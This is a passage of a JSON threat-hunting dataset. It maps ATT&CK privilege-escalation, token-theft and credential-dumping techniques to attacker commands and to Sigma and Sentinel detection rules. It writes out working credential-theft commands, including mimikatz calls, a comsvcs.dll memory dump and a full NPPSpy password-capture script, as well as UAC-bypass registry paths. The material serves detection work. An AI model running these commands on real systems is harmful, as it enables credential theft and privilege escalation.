-u=s", + "find / -perm -g=s", + "find / -perm -4000", + "find / -perm -2000" + ], + "timeframe": "30m", + "condition": "keywords | count() by host > 6" + }, + "falsepositives": [ + "Troubleshooting on Linux Machines" + ] + }, + { + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "experimental", + "description": "Detects an explotation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "references": [ + "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege" + ], + "author": "Florian Roth", + "date": "2019/11/20", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentImage": "*\\consent.exe", + "Image": "*\\iexplore.exe", + "CommandLine": "* http*" + }, + "rights1": { + "IntegrityLevel": "System" + }, + "rights2": { + "User": "NT AUTHORITY\\SYSTEM" + }, + "condition": "selection and ( rights1 or rights2 )" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Windows Kernel and 3rd-party drivers exploits. 
Token stealing", + "id": "8065b1b4-1778-4427-877f-6bf948b26d38", + "description": "Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level", + "references": [ + "https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "status": "experimental", + "author": "Teymur Kheirkhabarov (source), Daniil Yugoslavskiy (rule)", + "date": "2019/06/03", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "ParentIntegrityLevel": "Medium", + "IntegrityLevel": "System", + "User": "NT AUTHORITY\\SYSTEM" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "enrichment": [ + "EN_0001_cache_sysmon_event_id_1_info", + "EN_0002_enrich_sysmon_event_id_1_with_parent_info" + ] + }, + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + [ + "4688", + "Process Execution" + ], + [ + "Application Logs" + ], + [ + "1000", + " 1001", + "Windows Error Reporting" + ], + [ + "4688", + "Process Execution" + ], + [ + "Application Logs" + ], + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.justice.gov/file/1080281/download", + 
"https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ] + ] + }, + { + "technique_id": "T1088", + "command_list": [ + "uacbypass", + "One of the following:\nexploit/windows/local/bypassuac\nexploit/windows/local/bypassuac_injection\nexploit/windows/local/bypassuac_vbs", + "eventvwr.exe", + "HKEY_USERS\\*\\mscfile\\shell\\open\\command", + "mshta.exe", + "verclsid.exe", + "winword.exe", + "*.exe reg query", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths", + "Software\\Classes\\mscfile\\shell\\open\\command|mscfile\\shell\\open\\command", + "\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe|\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "\\Software\\Classes\\ms-settings\\shell\\open\\command", + "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe", + "powershell/privesc/ask", + "powershell/privesc/bypassuac", + "powershell/privesc/bypassuac_eventvwr", + "powershell/privesc/bypassuac_wscript", + "powershell/privesc/bypassuac_env", + "powershell/privesc/bypassuac_fodhelper", + "powershell/privesc/bypassuac_sdctlbypass", + "powershell/privesc/bypassuac_tokenmanipulation" + ], + "commands": [ + { + "command": "uacbypass", + 
"source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "One of the following:\nexploit/windows/local/bypassuac\nexploit/windows/local/bypassuac_injection\nexploit/windows/local/bypassuac_vbs", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "eventvwr.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "HKEY_USERS\\*\\mscfile\\shell\\open\\command", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "mshta.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "verclsid.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "*.exe reg query", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "Software\\Classes\\mscfile\\shell\\open\\command|mscfile\\shell\\open\\command", + "source": "SysmonHunter - UAC bypass", + "name": "" + }, + { + "command": "\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe|\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "source": "SysmonHunter - UAC bypass", + "name": "" + }, + { + "command": "\\Software\\Classes\\ms-settings\\shell\\open\\command", + "source": "SysmonHunter - UAC bypass", + "name": "" + }, + { + "command": "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe", + "source": "SysmonHunter - UAC bypass", + "name": "" + }, + { + "command": "powershell/privesc/ask", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module 
Command" + }, + { + "command": "powershell/privesc/bypassuac", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_eventvwr", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_wscript", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_env", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_fodhelper", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_sdctlbypass", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/bypassuac_tokenmanipulation", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1088", + "Built-in Windows Command": "", + "Cobalt Strike": "uacbypass", + "Metasploit": "One of the following:\nexploit/windows/local/bypassuac\nexploit/windows/local/bypassuac_injection\nexploit/windows/local/bypassuac_vbs", + "Description": "If you have a medium integrity process, but are an administrator, UACBypass will get you a high integrity process without prompting the user for confirmation." 
+ }, + { + "chain_id": "100012", + "os": "windows", + "parent_process": "eventvwr.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKEY_USERS\\*\\mscfile\\shell\\open\\command", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "bypass_uac", + "mitre_attack": "T1088", + "itw_sample": "" + }, + { + "chain_id": "100024", + "os": "windows", + "parent_process": "eventvwr.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "bypass_uac", + "mitre_attack": "T1088", + "itw_sample": "" + }, + { + "chain_id": "100047", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "verclsid.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "bypass_uac", + "mitre_attack": "T1088", + "itw_sample": "https://www.redcanary.com/blog/verclsid-exe-threat-detection/" + }, + { + "chain_id": "100096", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "verclsid.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "bypass_uac", + "mitre_attack": "T1088", + "itw_sample": "" + }, + { + "chain_id": "100203", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "reg query", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "bypass_uac", + 
"mitre_attack": "T1088", + "itw_sample": "" + }, + { + "name": "UAC bypass", + "description": null, + "level": "high", + "phase": "Privilege Escalation", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "Software\\Classes\\mscfile\\shell\\open\\command|mscfile\\shell\\open\\command" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "Software\\Classes\\mscfile\\shell\\open\\command|mscfile\\shell\\open\\command" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe|\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe|\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\Software\\Classes\\ms-settings\\shell\\open\\command" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Software\\Classes\\ms-settings\\shell\\open\\command" + } + } + }, + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe" + } + } + } + ] + }, + { + "Empire Module": "powershell/privesc/ask", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/ask\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac\": [\"T1088\"]," + }, + { + 
"Empire Module": "powershell/privesc/bypassuac_eventvwr", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_eventvwr\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_wscript", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_wscript\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_env", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_env\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_fodhelper", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_fodhelper\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_sdctlbypass", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_sdctlbypass\": [\"T1088\"]," + }, + { + "Empire Module": "powershell/privesc/bypassuac_tokenmanipulation", + "ATT&CK Technique #1": "T1088", + "ATT&CK Technique #2": "", + "Technique": "Bypass User Account Control", + "Concatenate for Python Dictionary": "\"powershell/privesc/bypassuac_tokenmanipulation\": [\"T1088\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_parent_command_line contains \"eventvwr.exe\"or process_parent_command_line contains \"fodhelper.exe\"or process_path contains \"ShellRunas.exe\")", + "name": "Bypass User Account Control Process" + }, + { + "product": "Azure 
Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (registry_key_path contains \"*\\\\mscfile\\\\shell\\\\open\\\\command\\\\*\"or registry_key_path contains \"*\\\\ms-settings\\\\shell\\\\open\\\\command\\\\*\")", + "name": "Bypass User Account Control Registry" + } + ], + "possible_detections": [ + { + "title": "UAC Bypass via Event Viewer", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", + "status": "experimental", + "description": "Detects UAC bypass method using Windows event viewer", + "references": [ + "https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/", + "https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "methregistry": { + "EventID": 13, + "TargetObject": "HKEY_USERS\\\\*\\mscfile\\shell\\open\\command" + }, + "methprocess": { + "EventID": 1, + "ParentImage": "*\\eventvwr.exe" + }, + "filterprocess": { + "Image": "*\\mmc.exe" + }, + "condition": "methregistry or ( methprocess and not filterprocess )" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1088", + "car.2019-04-001" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "UAC Bypass via sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects changes to HKCU:\\Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "references": [ + "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/" + ], + "author": "Omer Yampel", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 13, + "TargetObject": 
"HKEY_USERS\\\\*\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" + }, + "condition": "selection" + }, + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1088", + "car.2019-04-001" + ], + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Empire PowerShell UAC Bypass", + "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "status": "experimental", + "description": "Detects some Empire PowerShell UAC bypass methods", + "references": [ + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64" + ], + "author": "Ecco", + "date": "2019/08/30", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "* -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)*", + "* -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);*" + ] + }, + "condition": "selection" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1088", + "car.2019-04-001" + ], + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4624", + "Authentication logs" + ], + [ + "System calls" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4624", + "Authentication logs" + ], + [ + "System calls" + ] + ], + "external_reference": [ + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + 
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.group-ib.com/blog/cobalt" + ] + }, + { + "technique_id": "Credentials:", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "Category": "Credentials:", + "Built-in Windows Command": "", + "Cobalt Strike": "", + "Metasploit": "", + "Description": "" + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1134", + "command_list": [ + "Token Stealing:\nsteal_token pid#", + "Token Stealing:\nuse incognito\nlist_tokens -u\nimpersonate_token DOMAIN\\\\User\nor:\nsteal_token {pid}", + "powershell/credentials/tokens", + "powershell/management/runas", + "powershell/privesc/getsystem" + ], + "commands": [ + { + "command": "Token Stealing:\nsteal_token pid#", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Token Stealing:\nuse incognito\nlist_tokens -u\nimpersonate_token DOMAIN\\\\User\nor:\nsteal_token {pid}", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "powershell/credentials/tokens", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/runas", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/getsystem", + "source": 
"https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1134", + "Built-in Windows Command": "", + "Cobalt Strike": "Token Stealing:\nsteal_token pid#", + "Metasploit": "Token Stealing:\nuse incognito\nlist_tokens -u\nimpersonate_token DOMAIN\\\\User\nor:\nsteal_token {pid}", + "Description": "This steals the access token from another process and uses it to gain access to other services or computers. In Cobalt Strike, this token is only used when accessing remote systems, but in Meterpreter, this token is used for everything until it's dropped via rev2self. You need to be in a high integrity process for this to work." + }, + { + "Empire Module": "powershell/credentials/tokens", + "ATT&CK Technique #1": "T1134", + "ATT&CK Technique #2": "", + "Technique": "Access Token Manipulation", + "Concatenate for Python Dictionary": "\"powershell/credentials/tokens\": [\"T1134\"]," + }, + { + "Empire Module": "powershell/management/runas", + "ATT&CK Technique #1": "T1134", + "ATT&CK Technique #2": "", + "Technique": "Access Token Manipulation", + "Concatenate for Python Dictionary": "\"powershell/management/runas\": [\"T1134\"]," + }, + { + "Empire Module": "powershell/privesc/getsystem", + "ATT&CK Technique #1": "T1134", + "ATT&CK Technique #2": "", + "Technique": "Access Token Manipulation", + "Concatenate for Python Dictionary": "\"powershell/privesc/getsystem\": [\"T1134\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "API monitoring" + ], + [ + "Access Tokens" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "API monitoring" + ], + [ + "Access Tokens" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + 
"macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + 
"source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface 
and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf", + "https://www.justice.gov/file/1080281/download", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003", + "command_list": [ + "hashdump\nmimikatz !lsadump::sam", + "hashdump\nrun hashdump\nrun smart_hashdump\npost/windows/gather/credentials/domain_hashdump", + "logonpasswords\nmimikatz !sekurlsa::logonpasswords\nmimikatz 
!sekurlsa::msv\nmimikatz !sekurlsa::kerberos\nmimikatz !sekurlsa::wdigest", + "use mimikatz\nwdigest\nmsv\nkerberos\nlogonpasswords", + "PathToAtomicsFolder\\T1003\\bin\\gsecdump.exe -a\n", + "#{gsecdump_exe} -a\n", + "Copy-Item \"$env:Temp\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. 
Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", + "$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)\nif($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }\nC:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $id $env:TEMP\\svchost-exe.dmp full\n", + ".\\totallylegit.exe #{host.process.id} C:\\Users\\Public\\creds.dmp\n", + "ntdsutil.exe", + "HKLM\\SAM|HKLM\\Security\\\\Windows\\\\.+\\\\lsass.exe", + "\\\\Windows\\\\.+\\\\bcryptprimitives.dll|\\\\Windows\\\\.+\\\\bcrypt.dll|\\\\Windows\\\\.+\\\\ncrypt.dll", + "powershell/collection/ChromeDump", + "powershell/collection/FoxDump", + "powershell/collection/ninjacopy", + "powershell/collection/vaults/add_keepass_config_trigger", + "powershell/collection/vaults/find_keepass_config", + "powershell/collection/vaults/get_keepass_config_trigger", + "powershell/collection/vaults/keethief", + "powershell/collection/vaults/remove_keepass_config_trigger", + "powershell/credentials/enum_cred_store", + "powershell/credentials/mimikatz/cache", + "powershell/credentials/mimikatz/command", + "powershell/credentials/mimikatz/dcsync", + "powershell/credentials/mimikatz/dcsync_hashdump", + "powershell/credentials/mimikatz/extract_tickets", + "powershell/credentials/mimikatz/golden_ticket", + "powershell/credentials/mimikatz/logonpasswords", + "powershell/credentials/mimikatz/lsadump", + "powershell/credentials/mimikatz/mimitokens", + "powershell/credentials/mimikatz/sam", + "powershell/credentials/mimikatz/silver_ticket", + "powershell/credentials/mimikatz/trust_keys", + "powershell/credentials/powerdump", + "powershell/credentials/vault_credential", + "powershell/management/downgrade_account", + "powershell/management/wdigest_downgrade", + "powershell/privesc/gpp", + "powershell/privesc/mcafee_sitelist", + "python/collection/linux/hashdump", + "python/collection/linux/mimipenguin", + "python/collection/osx/hashdump", 
